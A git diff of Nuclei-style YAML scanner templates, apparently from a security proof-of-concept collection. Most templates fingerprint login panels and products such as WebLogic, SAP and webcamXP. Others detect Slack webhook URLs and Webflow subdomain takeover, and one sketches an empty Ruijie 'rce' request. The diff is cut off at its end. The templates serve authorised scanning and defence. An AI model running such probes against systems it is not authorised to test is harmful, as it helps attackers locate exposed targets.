+ name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: info
- description: Netsweeper WebAdmin was detected.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 2
- tags: tech,netsweeper,webadmin
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/start/"
- "{{BaseURL}}/webadmin/tools/systemstatus_remote.php"
-
headers:
Referer: "http://{{Hostname}}/webadmin/admin/systemstatus_inc_data.php"
-
matchers-condition: and
matchers:
- type: regex
@@ -30,9 +18,6 @@ http:
- "Netsweeper Inc"
condition: or
part: body
-
- type: status
status:
- 200
-
-# digest: 490a0046304402205de6ffa7cbd422100c6803e521ba44147430eab4ae2826cc630100cfeaad9b5c02207380f681eeac2ec58e5edd5500b25ca055f3a8b0bb66d9864f684d35be759279:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/netsweeper-webadmin-detect-9067.yaml b/poc/web/netsweeper-webadmin-detect-9067.yaml
index 63db6de63d..70603e15f4 100644
--- a/poc/web/netsweeper-webadmin-detect-9067.yaml
+++ b/poc/web/netsweeper-webadmin-detect-9067.yaml
@@ -1,16 +1,27 @@
id: netsweeper-webadmin-detect
+
info:
- name: Netsweeper WebAdmin detected
+ name: Netsweeper WebAdmin - Detect
author: dwisiswant0
severity: info
+ description: Netsweeper WebAdmin was detected.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 2
tags: tech,netsweeper,webadmin
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/webadmin/start/"
- "{{BaseURL}}/webadmin/tools/systemstatus_remote.php"
+
headers:
Referer: "http://{{Hostname}}/webadmin/admin/systemstatus_inc_data.php"
+
matchers-condition: and
matchers:
- type: regex
@@ -19,6 +30,9 @@ requests:
- "Netsweeper Inc"
condition: or
part: body
+
- type: status
status:
- 200
+
+# digest: 490a0046304402205de6ffa7cbd422100c6803e521ba44147430eab4ae2826cc630100cfeaad9b5c02207380f681eeac2ec58e5edd5500b25ca055f3a8b0bb66d9864f684d35be759279:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/opennms-web-console.yaml b/poc/web/opennms-web-console.yaml
index d50833ef6b..055c6b2323 100644
--- a/poc/web/opennms-web-console.yaml
+++ b/poc/web/opennms-web-console.yaml
@@ -1,20 +1,34 @@
id: opennms-web-console
+
info:
- name: OpenNMS web console
+ name: OpenNMS Web Console Login Panel - Detect
author: DhiyaneshDk
severity: info
- reference: https://www.exploit-db.com/ghdb/5468
- tags: panel,login
-requests:
+ description: OpenNMS Web Console login panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/5468
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: panel,login,edb
+
+http:
- method: GET
path:
- "{{BaseURL}}/opennms/login.jsp"
+
matchers-condition: and
matchers:
- type: word
words:
- "OpenNMS Web Console"
part: body
+
- type: status
status:
- 200
+
+# digest: 4a0a00473045022100c4bbc2c7092fe28f558fcaa4b73ac8775bcc6e536c3e6dbd579d63956013523e0220482045b0407213a481afc090fb82f542269616cbf0c769c2ee4115cf368cf827:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/oracle-iplanet-web-server.yaml b/poc/web/oracle-iplanet-web-server-9392.yaml
similarity index 100%
rename from poc/web/oracle-iplanet-web-server.yaml
rename to poc/web/oracle-iplanet-web-server-9392.yaml
diff --git a/poc/web/oracle-iplanet-web-server-9393.yaml b/poc/web/oracle-iplanet-web-server-9393.yaml
index dcf6b13bc8..f7bb146ace 100644
--- a/poc/web/oracle-iplanet-web-server-9393.yaml
+++ b/poc/web/oracle-iplanet-web-server-9393.yaml
@@ -4,11 +4,12 @@ info:
name: Detect Oracle-iPlanet-Web-Server
author: pussycat0x
severity: info
- tags: tech,oracle
metadata:
- fofa-query: 'app="Oracle-iPlanet-Web-Server'
+ max-request: 1
+ fofa-query: app="Oracle-iPlanet-Web-Server
+ tags: tech,oracle
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}"
@@ -16,7 +17,6 @@ requests:
matchers-condition: and
matchers:
- type: word
-
part: body
words:
- "Oracle iPlanet Web Server"
@@ -24,3 +24,5 @@ requests:
- type: status
status:
- 200
+
+# digest: 490a004630440220609b86d9a84db9945e09cb7170deff3c55f1df6b010cdded85064fca20fc9360022078f76d7916e3d272d78ac746644df57c1c475b279aee3c0250c2c56f7756f4c4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/ruijie-EWEB-rce.yaml b/poc/web/ruijie-EWEB-rce.yaml
index fe1aba9aed..593daa2dda 100644
--- a/poc/web/ruijie-EWEB-rce.yaml
+++ b/poc/web/ruijie-EWEB-rce.yaml
@@ -1,5 +1,4 @@
id: ruijie-EWEB-rce
-
info:
name: 锐捷VPN越权绑定&信息泄露
author: str1am
@@ -7,16 +6,14 @@ info:
reference:
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E9%94%90%E6%8D%B7-EWEB%E7%BD%91%E7%AE%A1%E7%B3%BB%E7%BB%9FRCE.md
tags: ruijie,rce
-
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
-
matchers-condition: and
matchers:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/web/saia-web-server-info-9979.yaml b/poc/web/saia-web-server-info-9979.yaml
index 36354a771d..05453dd358 100644
--- a/poc/web/saia-web-server-info-9979.yaml
+++ b/poc/web/saia-web-server-info-9979.yaml
@@ -1,21 +1,34 @@
id: saia-web-server
+
info:
- name: Saia PCD Web-Server
+ name: Saia PCD Web-Server Configuration Page - Detect
author: DhiyaneshDk
- severity: low
+ severity: info
+ description: Saia PCD Web-Server configuration page was detected.
reference:
- https://www.exploit-db.com/ghdb/6865
- tags: config,exposure
-requests:
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: edb,config,exposure
+
+http:
- method: GET
path:
- "{{BaseURL}}/loadtextfile.htm#programinfo"
+
matchers-condition: and
matchers:
- type: word
words:
- "
Saia PCD Web Server"
part: body
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100e29cf7a902d02e7311f6e99c6241f961b647d2f1e1604207229372caf608d7320221009948b28a87cc633b8f3190a60014bd67bdcd2fda80ef6abe5e811863fd547bce:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/saia-web-server-info.yaml b/poc/web/saia-web-server-info-9980.yaml
similarity index 100%
rename from poc/web/saia-web-server-info.yaml
rename to poc/web/saia-web-server-info-9980.yaml
diff --git a/poc/web/sap-netweaver-webgui-10057.yaml b/poc/web/sap-netweaver-webgui-10057.yaml
index c9974f3576..aa27e83989 100644
--- a/poc/web/sap-netweaver-webgui-10057.yaml
+++ b/poc/web/sap-netweaver-webgui-10057.yaml
@@ -2,8 +2,8 @@ id: sap-nw-webgui
info:
name: SAP NetWeaver WebGUI Detection
author: randomstr1ng
- severity: info
description: Detection of SAP NetWeaver ABAP Webserver WebGUI
+ severity: info
tags: sap,webserver
requests:
- method: GET
diff --git a/poc/web/sap-netweaver-webgui.yaml b/poc/web/sap-netweaver-webgui.yaml
deleted file mode 100644
index aa27e83989..0000000000
--- a/poc/web/sap-netweaver-webgui.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: sap-nw-webgui
-info:
- name: SAP NetWeaver WebGUI Detection
- author: randomstr1ng
- description: Detection of SAP NetWeaver ABAP Webserver WebGUI
- severity: info
- tags: sap,webserver
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/sap/bc/gui/sap/its/webgui"
- redirects: true
- max-redirects: 2
- matchers:
- - type: word
- part: body
- words:
- - "sap-system-login"
- - "
Logon"
- condition: or
diff --git a/poc/web/sap-web-dispatcher-10077.yaml b/poc/web/sap-web-dispatcher-10077.yaml
index df4de75244..ce92daf3b9 100644
--- a/poc/web/sap-web-dispatcher-10077.yaml
+++ b/poc/web/sap-web-dispatcher-10077.yaml
@@ -1,16 +1,18 @@
id: sap-web-dispatcher-detection
+
info:
name: SAP Web Dispatcher detection
author: randomstr1ng
- description: Detection of SAP Web Dispatcher service
severity: info
- tags: sap,webserver,proxy
+ description: Detection of SAP Web Dispatcher service
+ metadata:
+ max-request: 1
+ tags: sap,webserver,proxy,tech
-requests:
+http:
- method: GET
- redirects: true
+ host-redirects: true
max-redirects: 2
-
path:
- "{{BaseURL}}/inormalydonotexist"
@@ -19,3 +21,5 @@ requests:
part: body
words:
- "This error page was generated by SAP Web Dispatcher"
+
+# digest: 4a0a00473045022100b1af68a940f5a3ba74a0fa0f1679d4026b02eed1bc2470369153d0c7ce58c72502204300e4594f792cbe4da52108cf378d187989566dc20c168253a0cfce85374645:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/sap-web-dispatcher.yaml b/poc/web/sap-web-dispatcher-10078.yaml
similarity index 100%
rename from poc/web/sap-web-dispatcher.yaml
rename to poc/web/sap-web-dispatcher-10078.yaml
diff --git a/poc/web/sap-web-dispatcher-admin-portal-10070.yaml b/poc/web/sap-web-dispatcher-admin-portal-10070.yaml
deleted file mode 100644
index b3f3ad6f2a..0000000000
--- a/poc/web/sap-web-dispatcher-admin-portal-10070.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: sap-web-dispatcher-admin-portal
-
-info:
- name: SAP Web Dispatcher admin portal detection
- author: randomstr1ng
- severity: info
- description: Detection of SAP Web Dispatcher Admin Portal
- metadata:
- max-request: 1
- shodan-query: http.favicon.hash:-266008933
- tags: sap,webserver,proxy,tech
-
-http:
- - method: GET
- host-redirects: true
- max-redirects: 2
- path:
- - "{{BaseURL}}/sap/wdisp/admin/public/default.html"
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- condition: or
- words:
- - "Basic realm=\"WEB ADMIN\""
- - "SAP NetWeaver Application Server"
-
- - type: status
- condition: or
- status:
- - 401
- - 200
-
- - type: word
- part: body
- condition: or
- words:
- - "SAP Web Dispatcher"
- - "
Administration"
-
-# digest: 4a0a0047304502202db7ace47fc80bd2ecdc893fc506716130f39ede94c8933bc5477aa87c15ca8d022100ba00d74c08b5acce60f7ea0fd47070925378f5638ed489dfb97e0a26c038d0d1:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/slack-webhook.yaml b/poc/web/slack-webhook.yaml
index b1bdaf766c..c44af0fefa 100644
--- a/poc/web/slack-webhook.yaml
+++ b/poc/web/slack-webhook.yaml
@@ -1,4 +1,5 @@
id: slack-webhook
+
info:
name: Slack Webhook
author: gaurang
@@ -7,7 +8,10 @@ info:
file:
- extensions:
- all
+
extractors:
- type: regex
regex:
- "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}"
+
+# digest: 4a0a0047304502206557ca925847e608d57b3a0bac581a2f51d85421f88fec1579e5cef728feabc8022100f97bae693d3bdf94877bac3c5e53bec9765196113fa213567d0ae28ec092a819:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/spark-webui-unauth.yaml b/poc/web/spark-webui-unauth.yaml
index a917ae6951..b5b7470fdc 100644
--- a/poc/web/spark-webui-unauth.yaml
+++ b/poc/web/spark-webui-unauth.yaml
@@ -3,7 +3,8 @@ info:
name: Unauthenticated Spark WebUI
author: princechaddha
severity: medium
- reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/spark/unacc
tags: spark,unauth
requests:
- method: GET
diff --git a/poc/web/synology-web-station-10631.yaml b/poc/web/synology-web-station-10631.yaml
index 58dc7fec9b..637a740b03 100644
--- a/poc/web/synology-web-station-10631.yaml
+++ b/poc/web/synology-web-station-10631.yaml
@@ -1,19 +1,33 @@
id: synology-web-station
+
info:
- name: Synology Web Station
+ name: Synology Web Station Page - Detect
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/7125
- tags: tech,synology
-requests:
+ description: Synology Web Station page was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7125
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: tech,synology,edb
+
+http:
- method: GET
path:
- '{{BaseURL}}'
+
matchers-condition: and
matchers:
- type: word
words:
- '
Hello! Welcome to Synology Web Station!'
+
- type: status
status:
- 200
+
+# digest: 4a0a0047304502207768a29f7b0beae42dce5f17479a2498e1f9fad755c7ea1942e4b8975aba33f90221008a5b09a2ae04dec5d695dff02c64e76372b39d9b422b45244180a1d2f69e917a:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/total-web-10814.yaml b/poc/web/total-web-10814.yaml
deleted file mode 100644
index 8bd260cf04..0000000000
--- a/poc/web/total-web-10814.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: total-web-login
-info:
- name: Total Web Solution
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6811
- tags: panel
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '
Total Web Solutions'
- - type: status
- status:
- - 200
diff --git a/poc/web/total-web-10816.yaml b/poc/web/total-web-10816.yaml
new file mode 100644
index 0000000000..ecb0e56ec6
--- /dev/null
+++ b/poc/web/total-web-10816.yaml
@@ -0,0 +1,20 @@
+id: total-web-login
+info:
+ name: Total Web Solution
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6811
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
Total Web Solutions'
+ - type: status
+ status:
+ - 200
diff --git a/poc/web/total-web.yaml b/poc/web/total-web.yaml
index ecb0e56ec6..8bd260cf04 100644
--- a/poc/web/total-web.yaml
+++ b/poc/web/total-web.yaml
@@ -3,8 +3,7 @@ info:
name: Total Web Solution
author: dhiyaneshDK
severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6811
+ reference: https://www.exploit-db.com/ghdb/6811
tags: panel
requests:
- method: GET
diff --git a/poc/web/web-config-11124.yaml b/poc/web/web-config-11124.yaml
index e1901b117d..f63fa94d0a 100644
--- a/poc/web/web-config-11124.yaml
+++ b/poc/web/web-config-11124.yaml
@@ -1,26 +1,13 @@
id: web-config
-
info:
- name: Web Configuration File - Detect
- author: Yash Anand @yashanand155,DhiyaneshDK
+ name: Web Config file
+ author: Yash Anand @yashanand155
severity: info
- description: Web configuration file was detected.
- reference:
- - https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 2
tags: config,exposure
-
-http:
+requests:
- method: GET
path:
- '{{BaseURL}}/web.config'
- - '{{BaseURL}}/../../web.config'
-
matchers-condition: and
matchers:
- type: word
@@ -28,9 +15,6 @@ http:
-
-
condition: and
-
- type: status
status:
- 200
-
-# digest: 490a00463044022062cb4369acebf629ecb0a6bf788d7088c3237f06385b1f56a8c74ca8ad6d2d4802204afaa05d20bc9a4c5c3e211dfbe988e6c33681fd658aa9e00544e8c7c4019e9f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/web-ftp-detect-11136.yaml b/poc/web/web-ftp-detect-11136.yaml
deleted file mode 100644
index 646c4f7e98..0000000000
--- a/poc/web/web-ftp-detect-11136.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: web-ftp-detect
-info:
- name: Web FTP Detection
- author: pussycat0x
- severity: info
- reference: https://www.exploit-db.com/ghdb/7013
- tags: webftp,tech,ftp
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Web-FTP"
- - "square login"
- - type: status
- status:
- - 200
diff --git a/poc/web/web-ftp-detect-11137.yaml b/poc/web/web-ftp-detect-11137.yaml
index 7520867056..646c4f7e98 100644
--- a/poc/web/web-ftp-detect-11137.yaml
+++ b/poc/web/web-ftp-detect-11137.yaml
@@ -1,17 +1,14 @@
id: web-ftp-detect
-
info:
name: Web FTP Detection
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/7013
tags: webftp,tech,ftp
-
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
-
matchers-condition: and
matchers:
- type: word
@@ -20,4 +17,4 @@ requests:
- "square login"
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/web/web-ftp-detect-11138.yaml b/poc/web/web-ftp-detect-11138.yaml
new file mode 100644
index 0000000000..7520867056
--- /dev/null
+++ b/poc/web/web-ftp-detect-11138.yaml
@@ -0,0 +1,23 @@
+id: web-ftp-detect
+
+info:
+ name: Web FTP Detection
+ author: pussycat0x
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7013
+ tags: webftp,tech,ftp
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Web-FTP"
+ - "square login"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/web/web-local-craft-11139.yaml b/poc/web/web-local-craft-11139.yaml
deleted file mode 100644
index fda38c4136..0000000000
--- a/poc/web/web-local-craft-11139.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: weblocal-craft-login
-info:
- name: Web local craft Terminal Login
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6800
- tags: panel
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/home.html'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'WEB Local Craft Terminal'
- - type: status
- status:
- - 200
diff --git a/poc/web/web-local-craft-11141.yaml b/poc/web/web-local-craft-11141.yaml
new file mode 100644
index 0000000000..1ac402b50e
--- /dev/null
+++ b/poc/web/web-local-craft-11141.yaml
@@ -0,0 +1,20 @@
+id: weblocal-craft-login
+info:
+ name: Web local craft Terminal Login
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6800
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/home.html'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'WEB Local Craft Terminal'
+ - type: status
+ status:
+ - 200
diff --git a/poc/web/web-service-panel.yaml b/poc/web/web-service-panel.yaml
index 9a30df6abd..1e241b5a7f 100644
--- a/poc/web/web-service-panel.yaml
+++ b/poc/web/web-service-panel.yaml
@@ -1,19 +1,33 @@
id: web-service-panel
+
info:
- name: WEB SERVICE Panel
+ name: Web Service Panel -Detect
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/7116
- tags: panel,service
-requests:
+ description: Web Service panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7116
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: edb,panel,service
+
+http:
- method: GET
path:
- '{{BaseURL}}'
+
matchers-condition: and
matchers:
- type: word
words:
- 'WEB SERVICE'
+
- type: status
status:
- 200
+
+# digest: 4a0a00473045022100c5cc44e49283a0b27782bca26dc69b8606e5b4bcedfb66abcd09cc24e3397bcd022002a91f2d20643990032e71f41916cbe69775ea4c852da9bfc8d9a9f1e3303129:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/web-suite-detect-11167.yaml b/poc/web/web-suite-detect-11167.yaml
deleted file mode 100644
index 00a9728d0e..0000000000
--- a/poc/web/web-suite-detect-11167.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: web-suite-detect
-info:
- name: Web Suite Detect
- author: pikpikcu
- severity: info
- metadata:
- fofa-query: "Web Suite 2021 Login"
- tags: tech,web-suite
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/ws2020/"
- - "{{BaseURL}}/ws2021/"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'www.bqe.com">BQE Software Inc.'
- - 'Web Suite'
- condition: and
- - type: status
- status:
- - 200
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "Version: (.*)"
diff --git a/poc/web/web-suite-detect.yaml b/poc/web/web-suite-detect.yaml
deleted file mode 100644
index 33bf8280f2..0000000000
--- a/poc/web/web-suite-detect.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: web-suite-detect
-
-info:
- name: Web Suite Detect
- author: pikpikcu
- severity: info
- metadata:
- fofa-query: "Web Suite 2021 Login"
- tags: tech,web-suite
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/ws2020/"
- - "{{BaseURL}}/ws2021/"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'www.bqe.com">BQE Software Inc.'
- - 'Web Suite'
- condition: and
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "Version: (.*)"
diff --git a/poc/web/webcamxp-5-11122.yaml b/poc/web/webcamxp-5-11122.yaml
new file mode 100644
index 0000000000..01ffef8b54
--- /dev/null
+++ b/poc/web/webcamxp-5-11122.yaml
@@ -0,0 +1,34 @@
+id: webcamxp-5
+
+info:
+ name: WebcamXP 5 Login Panel - Detect
+ author: dhiyaneshDK
+ severity: info
+ description: WebcamXP 5 login panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7448
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"webcamXP 5"
+ tags: iot,edb
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/home.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'webcamXP 5'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402202093e097b013ffa84a34fb92d7ea73483077f22fec6de3409dcb51f74e79fd7f022019bcc0302ac58911e1d921bb5d1476d23229a13895e1505b09ceecb1614e6dec:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/webcamxp-5.yaml b/poc/web/webcamxp-5.yaml
deleted file mode 100644
index 4af1a58d72..0000000000
--- a/poc/web/webcamxp-5.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: webcamxp-5
-info:
- name: webcamXP 5
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/7448
- tags: iot
- metadata:
- shodan-query: 'http.title:"webcamXP 5"'
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/home.html'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'webcamXP 5'
- - type: status
- status:
- - 200
diff --git a/poc/web/webeditors-11130.yaml b/poc/web/webeditors-11130.yaml
index 19617c7d00..bdadea329e 100644
--- a/poc/web/webeditors-11130.yaml
+++ b/poc/web/webeditors-11130.yaml
@@ -3,7 +3,6 @@ info:
name: Web Editors
author: pwnmachine
severity: info
- tags: panel
requests:
- method: GET
path:
diff --git a/poc/web/webflow-takeover-11132.yaml b/poc/web/webflow-takeover-11133.yaml
similarity index 100%
rename from poc/web/webflow-takeover-11132.yaml
rename to poc/web/webflow-takeover-11133.yaml
diff --git a/poc/web/webflow-takeover.yaml b/poc/web/webflow-takeover.yaml
index 3235a030ad..88e0615e50 100644
--- a/poc/web/webflow-takeover.yaml
+++ b/poc/web/webflow-takeover.yaml
@@ -1,32 +1,16 @@
id: webflow-takeover
-
info:
name: webflow takeover detection
- author: pdteam,keni0k
+ author: pdteam
severity: high
reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44
- - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172
- metadata:
- max-request: 1
+ - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
-
- matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - Host != ip
-
- type: word
words:
- - "The page you are looking for doesn't exist or has been moved."
- - "The page you are looking for doesn't exist or has been moved"
- The page you are looking for doesn't exist or has been moved.
- condition: or
-
-# digest: 490a0046304402204bfb1a738886aedcb3f3352ceb4b0107f06f493d2e7f0d6eae876478d5330480022016590b1b9caae2367b5799a7a422532aa4939b68b9758152817ab532d0384f48:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/weblogic-detect-11143.yaml b/poc/web/weblogic-detect-11143.yaml
deleted file mode 100644
index 23f46a01a8..0000000000
--- a/poc/web/weblogic-detect-11143.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: weblogic-detect
-info:
- name: Detect Weblogic
- author: pdteam
- severity: info
- tags: tech,weblogic
- metadata:
- shodan-query: product:"Oracle Weblogic"
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/{{randstr}}"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "From RFC 2068"
- - "Error 404--Not Found"
- condition: and
- - type: status
- status:
- - 404
diff --git a/poc/web/weblogic-iiop-detect.yaml b/poc/web/weblogic-iiop-detect.yaml
index bf7d91dfc6..2c838ac332 100644
--- a/poc/web/weblogic-iiop-detect.yaml
+++ b/poc/web/weblogic-iiop-detect.yaml
@@ -1,16 +1,21 @@
id: weblogic-iiop-detect
+
info:
- name: Detect Weblogic IIOP Protocol
+ name: Weblogic IIOP Protocol Detection
author: F1tz
severity: info
- description: Check IIOP protocol status.
- tags: network,weblogic
-network:
+ description: |
+ The IIOP (Internet Inter-ORB Protocol) protocol makes it possible for distributed programs written in different programming languages to communicate over the Internet.
+ metadata:
+ max-request: 1
+ tags: network,weblogic,detect
+tcp:
- inputs:
- data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}"
host:
- "{{Hostname}}"
read-size: 1024
+
matchers-condition: and
matchers:
- type: word
@@ -18,3 +23,5 @@ network:
- "GIOP"
- "weblogic"
condition: and
+
+# digest: 4a0a004730450220551483dd9ea5264e2629c57759510097e96f4f2423af9d8417b885ffba49f789022100b6d4d798cd48dd10e63818ca039c389cbae7e857f028b9d14017cea687da5b15:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/weblogic-login.yaml b/poc/web/weblogic-login.yaml
index cf4321fc1f..950797c705 100644
--- a/poc/web/weblogic-login.yaml
+++ b/poc/web/weblogic-login.yaml
@@ -1,25 +1,38 @@
id: weblogic-login
+
info:
- name: Weblogic Login Panel
+ name: Oracle WebLogic Login Panel - Detect
author: bing0o,meme-lord
severity: info
- tags: panel,oracle,weblogic,login
+ description: Oracle WebLogic login panel was detected.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
metadata:
+ max-request: 1
shodan-query: product:"Oracle Weblogic"
-requests:
+ tags: panel,oracle,weblogic,login
+
+http:
- method: GET
path:
- "{{BaseURL}}/console/login/LoginForm.jsp"
+
matchers-condition: and
matchers:
- type: word
words:
- "WebLogic"
+
- type: status
status:
- 200
+
extractors:
- type: regex
group: 1
regex:
- 'WebLogic Server Version: (.*?)<'
+
+# digest: 490a0046304402205f0444b6f2cca35e89a2379a553fab9dcb3c1a3ee8f9b75cebc15dd4d135446c0220510b883cb5c850e3534635f5bea482d5748568848a14af13c4ad2c4751cbfd07:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/weblogic-t3-detect-11152.yaml b/poc/web/weblogic-t3-detect-11152.yaml
deleted file mode 100644
index fd503f75f3..0000000000
--- a/poc/web/weblogic-t3-detect-11152.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: weblogic-t3-detect
-info:
- name: Detect Weblogic T3 Protocol
- author: F1tz,milo2012,wdahlenb
- severity: info
- description: Check T3 protocol status.
- tags: network,weblogic
-network:
- - inputs:
- - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
- host:
- - "{{Hostname}}"
- read-size: 1024
- matchers:
- - type: word
- words:
- - "HELO"
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "HELO:(.*).false"
- - inputs:
- - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
- host:
- - "tls://{{Hostname}}"
- read-size: 1024
- matchers:
- - type: word
- words:
- - "HELO"
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "HELO:(.*).false"
diff --git a/poc/web/weblogic-t3-detect-11153.yaml b/poc/web/weblogic-t3-detect-11153.yaml
new file mode 100644
index 0000000000..79f4887cf5
--- /dev/null
+++ b/poc/web/weblogic-t3-detect-11153.yaml
@@ -0,0 +1,41 @@
+id: weblogic-t3-detect
+
+info:
+ name: Detect Weblogic T3 Protocol
+ author: F1tz,milo2012,wdahlenb
